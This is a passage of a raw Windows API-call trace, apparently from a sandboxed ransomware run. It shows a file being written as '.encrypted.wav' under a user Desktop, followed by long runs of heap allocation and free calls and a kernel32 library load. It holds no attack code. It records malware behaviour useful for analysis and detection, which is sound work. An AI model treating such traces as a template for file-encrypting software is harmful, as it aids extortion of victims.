lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 105 [0031.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0031.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0031.663] WriteFile (in: hFile=0x140, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x68, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x68, lpOverlapped=0x0) returned 1 [0031.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0031.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.663] CloseHandle (hObject=0x140) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.664] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.664] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.666] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.666] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.666] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.666] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.667] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.669] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.671] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.672] 